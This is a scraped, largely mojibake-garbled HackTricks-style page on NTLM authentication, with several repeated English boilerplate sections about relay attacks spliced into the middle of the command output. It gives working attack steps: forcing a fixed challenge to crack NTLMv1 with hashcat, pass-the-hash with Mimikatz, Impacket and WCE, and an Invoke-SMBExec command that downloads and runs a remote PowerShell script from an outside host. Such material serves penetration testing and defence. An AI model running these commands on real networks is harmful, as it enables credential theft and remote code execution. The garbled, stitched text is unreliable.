.. | ||
atexec.md | ||
places-to-steal-ntlm-creds.md | ||
psexec-and-winexec.md | ||
README.md | ||
smbexec.md | ||
winrm.md | ||
wmicexec.md |
NTLM
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ã«ã¢ã¯ã»ã¹ãããã§ããããŸãã¯HackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
- The PEASS FamilyãçºèŠããç¬å çãªNFTsã®ã³ã¬ã¯ã·ã§ã³ãèŠã€ããŸã
- å ¬åŒPEASSïŒHackTricks swagãæã«å ¥ããŸããã
- ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§**ðŠ**@carlospolopmããã©ããŒããŠãã ããã
- ãããã³ã°ããªãã¯ãå ±æããããã« hacktricks repo ãš hacktricks-cloud repo ã«PRãæåºããŠãã ããã
åºæ¬æ å ±
NTLMè³æ Œæ å ±: ãã¡ã€ã³åïŒããã°ïŒããŠãŒã¶ãŒåããã¹ã¯ãŒãããã·ã¥ã
LMã¯Windows XPããã³ãµãŒããŒ2003ã§ã®ã¿æå¹ã§ãïŒLMããã·ã¥ã¯ã¯ã©ãã¯å¯èœïŒãLMããã·ã¥AAD3B435B51404EEAAD3B435B51404EEã¯ãLMã䜿çšãããŠããªãããšãæå³ããŸãïŒç©ºã®æååã®LMããã·ã¥ã§ãïŒã
ããã©ã«ãã§ã¯Kerberosã䜿çšããããããNTLMã¯Active Directoryãæ§æãããŠããªãããã¡ã€ã³ãååšããªããKerberosãæ©èœããŠããªãïŒæ§æãäžè¯ïŒããŸãã¯ã¯ã©ã€ã¢ã³ããæå¹ãªãã¹ãåã®ä»£ããã«IPã䜿çšããŠæ¥ç¶ããããšããå Žåã«ã®ã¿äœ¿çšãããŸãã
NTLMèªèšŒã®ãããã¯ãŒã¯ãã±ããã«ã¯ããã㌠"NTLMSSP" ããããŸãã
ãããã³ã«ïŒLMãNTLMv1ãããã³NTLMv2ã¯ãDLL %windir%\Windows\System32\msv1_0.dll ã§ãµããŒããããŠããŸãã
LMãNTLMv1ããã³NTLMv2
䜿çšããããããã³ã«ã確èªããã³èšå®ã§ããŸãïŒ
GUI
_secpol.msc_ãå®è¡ -> ããŒã«ã«ããªã·ãŒ -> ã»ãã¥ãªãã£ãªãã·ã§ã³ -> ãããã¯ãŒã¯ã»ãã¥ãªãã£ïŒLANãããŒãžã£ãŒèªèšŒã¬ãã«ã ã¬ãã«ã¯6ã€ãããŸãïŒ0ãã5ãŸã§ïŒã
ã¬ãžã¹ããª
ããã«ãããã¬ãã«5ãèšå®ãããŸãïŒ
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
å¯èœãªå€:
0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM
åºæ¬çãªNTLMãã¡ã€ã³èªèšŒã¹ããŒã
- ãŠãŒã¶ãŒãè³æ Œæ å ±ãå ¥åããŸã
- ã¯ã©ã€ã¢ã³ããã·ã³ãèªèšŒãªã¯ãšã¹ããéä¿¡ãããã¡ã€ã³åãšãŠãŒã¶ãŒåãéä¿¡ããŸã
- ãµãŒããŒããã£ã¬ã³ãžãéä¿¡ããŸã
- ã¯ã©ã€ã¢ã³ãã¯ãã¹ã¯ãŒãã®ããã·ã¥ã䜿çšããŠãã£ã¬ã³ãžãæå·åããå¿çãšããŠéä¿¡ããŸã
- ãµãŒããŒããã¡ã€ã³ã³ã³ãããŒã©ãŒã«ãã¡ã€ã³åããŠãŒã¶ãŒåããã£ã¬ã³ãžãå¿çãéä¿¡ããŸããActive Directoryãæ§æãããŠããªãå Žåãããã¡ã€ã³åããµãŒããŒåã®å Žåãè³æ Œæ å ±ã¯ããŒã«ã«ã§ç¢ºèªãããŸãã
- ãã¡ã€ã³ã³ã³ãããŒã©ãŒããã¹ãŠãæ£ãããã©ããã確èªããæ å ±ããµãŒããŒã«éä¿¡ããŸã
ãµãŒããŒãšãã¡ã€ã³ã³ã³ãããŒã©ãŒã¯ãNTDS.DITããŒã¿ããŒã¹å ã«ãµãŒããŒã®ãã¹ã¯ãŒãããããããNetlogonãµãŒããŒãä»ããŠã»ãã¥ã¢ãã£ãã«ãäœæã§ããŸãã
ããŒã«ã«NTLMèªèšŒã¹ããŒã
èªèšŒã¯ä»¥åã«è¿°ã¹ããã®ãšåãã§ããããµãŒããŒã¯SAMãã¡ã€ã«å ã§èªèšŒããããšãããŠãŒã¶ãŒã®ããã·ã¥ãç¥ã£ãŠããŸãããããã£ãŠããã¡ã€ã³ã³ã³ãããŒã©ãŒã«åãåããã代ããã«ããµãŒããŒèªäœããŠãŒã¶ãŒã®èªèšŒã確èªããŸãã
NTLMv1ãã£ã¬ã³ãž
ãã£ã¬ã³ãžã®é·ãã¯8ãã€ãã§ãå¿çã¯24ãã€ãã§ãã
NTããã·ã¥ïŒ16ãã€ãïŒã¯7ãã€ããã€3ã€ã®éšåã«åãããŸãïŒ7B + 7B +ïŒ2B + 0x00*5ïŒïŒïŒæåŸã®éšåã¯ãŒãã§åããããŸãããã®åŸãåéšåããšã«ãã£ã¬ã³ãžãå¥ã ã«æå·åãããçµæã®æå·åããããã€ããçµåãããŸããåèšïŒ8B + 8B + 8B = 24ãã€ãã
åé¡ç¹ïŒ
- ã©ã³ãã æ§ã®æ¬ åŠ
- 3ã€ã®éšåã¯åå¥ã«æ»æãããNTããã·ã¥ãèŠã€ããå¯èœæ§ããããŸã
- DESã¯ç Žããããã
- 3çªç®ã®ããŒã¯åžžã«5ã€ã®ãŒãã§æ§æãããŠããŸãã
- åããã£ã¬ã³ãžãäžãããããšãå¿çã¯åãã«ãªããŸãããããã£ãŠã被害è ã«å¯ŸããŠæååã1122334455667788ãããã£ã¬ã³ãžãšããŠäžããäºåèšç®ãããã¬ã€ã³ããŒããŒãã«ã䜿çšããŠäœ¿çšãããå¿çãæ»æã§ããŸãã
NTLMv1æ»æ
æè¿ã§ã¯ãç¡å¶éå§ä»»ãæ§æãããç°å¢ãèŠã€ããããšãå°ãªããªã£ãŠããŸãããããã¯æªçšã§ããªãããšãæå³ããªãããšã«æ³šæããŠãã ããã
ADã§æ¢ã«æã£ãŠããäžéšã®è³æ Œæ
å ±/ã»ãã·ã§ã³ãæªçšããŠãããªã³ãã¹ããŒã©ãŒãµãŒãã¹ãæ§æããŠãã¹ããæäœäžã«èªèšŒãããããšãã§ããŸãããã®åŸãmetasploit auxiliary/server/capture/smb
ãŸãã¯responder
ã䜿çšããŠãèªèšŒãã£ã¬ã³ãžã1122334455667788ã«èšå®ããèªèšŒè©Šè¡ããã£ããã£ãããããNTLMv1ã䜿çšããŠè¡ãããå Žåãç Žãããšãã§ããŸãã
responder
ã䜿çšããŠããå Žåã¯ãèªèšŒãããŠã³ã°ã¬ãŒãããããšããŠã**ãã©ã°--lm
**ã䜿çšããŠã¿ãããšãã§ããŸãã
ãã®ãã¯ããã¯ã§ã¯ãèªèšŒã¯NTLMv1ã䜿çšããŠå®è¡ããå¿
èŠãããããšã«æ³šæããŠãã ããïŒNTLMv2ã¯æå¹ã§ã¯ãããŸããïŒã
ããªã³ã¿ãŒã¯èªèšŒäžã«ã³ã³ãã¥ãŒã¿ãŒã¢ã«ãŠã³ãã䜿çšããã³ã³ãã¥ãŒã¿ãŒã¢ã«ãŠã³ãã¯é·ãã©ã³ãã ãªãã¹ã¯ãŒãã䜿çšããŠããŸãããäžè¬çãªèŸæžã䜿çšããŠç Žãããšã¯ã§ããªãå¯èœæ§ããããŸããããããNTLMv1èªèšŒã¯DESã䜿çšããŠããŸãïŒè©³çŽ°ã¯ãã¡ãïŒããã®ãããDESãç Žãããã«ç¹ã«å°çšã®ãµãŒãã¹ã䜿çšããããšã§ããããç Žãããšãã§ããŸãïŒããšãã°ãhttps://crack.sh/ã䜿çšã§ããŸãïŒã
hashcatã䜿çšããNTLMv1æ»æ
NTLMv1ã¯NTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multiã䜿çšããŠãhashcatã§ç Žãããšãã§ãã圢åŒã§NTLMv1ã¡ãã»ãŒãžããã©ãŒãããã§ããŸãã
ã³ãã³ã
python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
NTLM Relay Attack
Introduction
NTLM relay attacks are a common technique used by attackers to escalate privileges in a Windows environment. This attack involves intercepting NTLM authentication traffic and relaying it to a target server to gain unauthorized access.
How it Works
- The attacker intercepts NTLM authentication traffic between a client and a server.
- The attacker relays this traffic to another server, tricking it into believing the attacker is the legitimate user.
- The attacker can then execute commands on the target server with the privileges of the compromised user.
Mitigation
To mitigate NTLM relay attacks, consider implementing the following measures:
- Enforce SMB Signing: Require SMB signing to prevent tampering with authentication traffic.
- Enable LDAP Signing: Enable LDAP signing to protect against relay attacks on LDAP traffic.
- Use Extended Protection for Authentication: This helps protect against NTLM relay attacks by requiring channel binding tokens.
By implementing these measures, you can significantly reduce the risk of falling victim to NTLM relay attacks.
['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']
Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595
To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
NTLM Relaying
Introduction
NTLM relaying is a common technique used by attackers to escalate privileges in a Windows environment. This attack involves intercepting an NTLM authentication request and relaying it to another machine, tricking the target into authenticating against a malicious server.
How it Works
- The attacker intercepts an NTLM authentication request from a victim machine.
- The attacker relays the authentication request to a different machine on the network.
- The malicious server on the network then forwards the authentication request to a target server.
- The target server responds to the authentication request, thinking it is coming from the victim machine.
- The attacker gains access to the target server using the victim's credentials.
Mitigation
To prevent NTLM relaying attacks, consider implementing the following measures:
- Disable NTLM authentication in favor of more secure protocols like Kerberos.
- Enable SMB signing to prevent tampering with SMB traffic.
- Implement Extended Protection for Authentication to protect against relaying attacks.
- Use Group Policy to restrict NTLM usage in the network.
By implementing these measures, you can significantly reduce the risk of NTLM relaying attacks in your Windows environment.
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
å®è¡ããhashcatïŒåæ£ã¯hashtopolisãªã©ã®ããŒã«ãä»ããŠæé©ã§ãïŒããã«ã¯ãã以å€ã«æ°æ¥ããããŸãã
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
ãã®å Žåããã¹ã¯ãŒãããpasswordãã§ããããšãããã£ãŠããã®ã§ããã¢ç®çã§äžæ£è¡çºãè¡ããŸãã
python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d
echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand
次ã«ãhashcatãŠãŒãã£ãªãã£ã䜿çšããŠãã¯ã©ãã¯ãããDESããŒãNTLMããã·ã¥ã®äžéšã«å€æããå¿ èŠããããŸãïŒ
./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1
./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2
NTLM
Overview
NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. It is commonly used for single sign-on and is the default authentication protocol in Windows environments.
Weaknesses
NTLM has several weaknesses that make it vulnerable to attacks, including:
- Pass-the-Hash: Attackers can use the hash of a user's password to authenticate as that user without knowing the actual password.
- Pass-the-Ticket: Attackers can use stolen ticket-granting tickets to authenticate to services as a legitimate user.
- Relay Attacks: Attackers can relay authentication attempts to other services, allowing them to impersonate users.
Mitigations
To mitigate the weaknesses of NTLM, consider the following measures:
- Disable NTLM: Whenever possible, disable NTLM in favor of more secure authentication protocols like Kerberos.
- Enforce SMB Signing: Require SMB signing to protect against man-in-the-middle attacks.
- Enable LDAP Signing: Enable LDAP signing to prevent man-in-the-middle attacks on LDAP traffic.
- Use Extended Protection for Authentication: Enable Extended Protection for Authentication to protect against NTLM relay attacks.
By understanding the weaknesses of NTLM and implementing these mitigations, you can improve the security of your Windows environment.
./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
586c # this is the last part
NTLM Relay Attack
Overview
NTLM relay attacks are a common technique used by attackers to exploit the NTLM authentication protocol. By intercepting and relaying NTLM authentication messages, an attacker can impersonate a legitimate user and gain unauthorized access to resources on a network.
How it works
- The attacker intercepts an NTLM authentication request from a victim machine to a server.
- The attacker relays the authentication request to another server on the network.
- The second server responds to the authentication request, believing it is coming from the victim machine.
- If successful, the attacker can access resources on the second server using the victim's credentials.
Mitigation
To protect against NTLM relay attacks, consider implementing the following measures:
- Disable NTLM authentication in favor of more secure protocols like Kerberos.
- Enable SMB signing to prevent tampering with authentication messages.
- Implement Extended Protection for Authentication to prevent relay attacks.
- Use strong, unique passwords to make credential theft more difficult for attackers.
By taking these steps, you can help secure your network against NTLM relay attacks and protect sensitive information from unauthorized access.
NTHASH=b4b9b02e6f09a9bd760f388b6700586c
NTLMv2 ãã£ã¬ã³ãž
ãã£ã¬ã³ãžã®é·ã㯠8 ãã€ãã§ããã2 ã€ã®ã¬ã¹ãã³ã¹ãéä¿¡ãããŸãïŒ1 ã€ã¯24 ãã€ãã§ããã 1 ã€ã®é·ãã¯å¯å€ã§ãã
æåã®ã¬ã¹ãã³ã¹ã¯ãã¯ã©ã€ã¢ã³ããšãã¡ã€ã³ããæ§æãããæååã䜿çšããŠHMAC_MD5ã䜿ã£ãŠæå·åããNT ããã·ã¥ã®MD4 ããã·ã¥ãããŒãšããŠäœ¿çšããŸãããã®åŸãçµæã¯ãã£ã¬ã³ãžãæå·åããããã®ããŒãšããŠäœ¿çšãããŸããããã«8 ãã€ãã®ã¯ã©ã€ã¢ã³ã ãã£ã¬ã³ãžãè¿œå ãããŸããåèšïŒ24 Bã
2 çªç®ã®ã¬ã¹ãã³ã¹ã¯ãè€æ°ã®å€ïŒæ°ããã¯ã©ã€ã¢ã³ã ãã£ã¬ã³ãžããªãã¬ã€æ»æãåé¿ããããã®ã¿ã€ã ã¹ã¿ã³ããªã©ïŒã䜿çšããŠäœæãããŸãã
æåããèªèšŒããã»ã¹ããã£ããã£ãã pcap ãã¡ã€ã«ãããå Žåããã®ã¬ã€ãã«åŸã£ãŠãã¡ã€ã³ããŠãŒã¶ãŒåããã£ã¬ã³ãžãã¬ã¹ãã³ã¹ãååŸãããã¹ã¯ãŒãã解èªããŠã¿ãããšãã§ããŸãïŒhttps://research.801labs.org/cracking-an-ntlmv2-hash/
ãã¹ã»ã¶ã»ããã·ã¥
被害è
ã®ããã·ã¥ãååŸãããããããåœè£
ããããšãã§ããŸãã
ãã®ããã·ã¥ã䜿çšã㊠NTLM èªèšŒãå®è¡ããããŒã«ã䜿çšããå¿
èŠããããŸãããŸãã¯ãæ°ããã»ãã·ã§ã³ãã°ãªã³ãäœæãããã®ããã·ã¥ãLSASSã«ã€ã³ãžã§ã¯ãããããšãã§ããŸãããã®ãããNTLM èªèšŒãå®è¡ããããšãã«ãã®ããã·ã¥ã䜿çšãããŸãã æåŸã®ãªãã·ã§ã³ã¯ mimikatz ãè¡ãããšã§ãã
ãã¹ã»ã¶ã»ããã·ã¥æ»æã¯ã³ã³ãã¥ãŒã¿ ã¢ã«ãŠã³ãã䜿çšããŠãå®è¡ã§ããããšãèŠããŠãããŠãã ããã
Mimikatz
管çè ãšããŠå®è¡ããå¿ èŠããããŸã
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
ããã«ãããmimikatzãèµ·åãããŠãŒã¶ãŒã«å±ããããã»ã¹ãéå§ãããŸãããLSASSå
éšã§ã¯ãä¿åãããè³æ Œæ
å ±ã¯mimikatzãã©ã¡ãŒã¿å
ã«ãããŸãããã®åŸããã®ãŠãŒã¶ãŒã§ãããã®ããã«ãããã¯ãŒã¯ãªãœãŒã¹ã«ã¢ã¯ã»ã¹ã§ããŸãïŒrunas /netonly
ããªãã¯ã«é¡äŒŒããŠããŸãããå¹³æãã¹ã¯ãŒããç¥ãå¿
èŠã¯ãããŸããïŒã
Linuxããã®Pass-the-Hash
LinuxããPass-the-Hashã䜿çšããŠWindowsãã·ã³ã§ã³ãŒãå®è¡ãååŸã§ããŸãã
ãã¡ããã¯ãªãã¯ããŠæ¹æ³ãåŠãã§ãã ããã
Impacket Windowsã³ã³ãã€ã«æžã¿ããŒã«
Windowsçšã®impacketãã€ããªããã¡ãããããŠã³ããŒãã§ããŸãã
- psexec_windows.exe
C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
- wmiexec.exe
wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
- atexec.exeïŒãã®å Žåãã³ãã³ããæå®ããå¿
èŠããããŸããcmd.exeãšpowershell.exeã¯å¯Ÿè©±åã·ã§ã«ãååŸããããã«æå¹ã§ã¯ãããŸããïŒ
C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
- ä»ã«ãããã€ãã®Impacketãã€ããªããããŸã...
Invoke-TheHash
ãã¡ãããpowershellã¹ã¯ãªãããå ¥æã§ããŸã: https://github.com/Kevin-Robertson/Invoke-TheHash
Invoke-SMBExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-WMIExec
Invoke-WMIExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-SMBClient
Invoke-SMBClient
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
Invoke-SMBEnum
Invoke-SMBEnum
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
Invoke-TheHash
ãã®æ©èœã¯ä»ã®ãã¹ãŠã®æ©èœãçµã¿åããããã®ã§ããè€æ°ã®ãã¹ããæž¡ãããšãã§ããé€å€ããããšãã§ãã䜿çšããããªãã·ã§ã³ãéžæã§ããŸãïŒSMBExecãWMIExecãSMBClientãSMBEnumïŒãSMBExecãšWMIExecã®ãããããéžæããå Žåã§ããCommand ãã©ã¡ãŒã¿ãæå®ããªãå Žåã¯ãåã«ååãªæš©éããããã©ããããã§ãã¯ããŸãã
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0
Evil-WinRM ãã¹ã»ã¶ã»ããã·ã¥
Windows Credentials Editor (WCE)
管çè ãšããŠå®è¡ããå¿ èŠããããŸã
ãã®ããŒã«ã¯mimikatzãšåãããšãè¡ããŸãïŒLSASSã¡ã¢ãªãå€æŽããŸãïŒã
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
ãŠãŒã¶ãŒåãšãã¹ã¯ãŒãã䜿çšããæåã®Windowsãªã¢ãŒãå®è¡
{% content-ref url="../lateral-movement/" %} lateral-movement {% endcontent-ref %}
Windowsãã¹ãããã®è³æ Œæ å ±ã®æœåº
Windowsãã¹ãããè³æ Œæ å ±ãååŸããæ¹æ³ã«ã€ããŠã®è©³çŽ°ã¯ããã®ããŒãžãèªãã§ãã ããã
NTLMãªã¬ãŒãšã¬ã¹ãã³ããŒ
ãããã®æ»æãå®è¡ããæ¹æ³ã®è©³çŽ°ãªã¬ã€ãã«ã€ããŠã¯ããã¡ããèªãã§ãã ããã
ãããã¯ãŒã¯ãã£ããã£ããNTLMãã£ã¬ã³ãžã解æãã
https://github.com/mlgualtieri/NTLMRawUnHideã䜿çšã§ããŸãã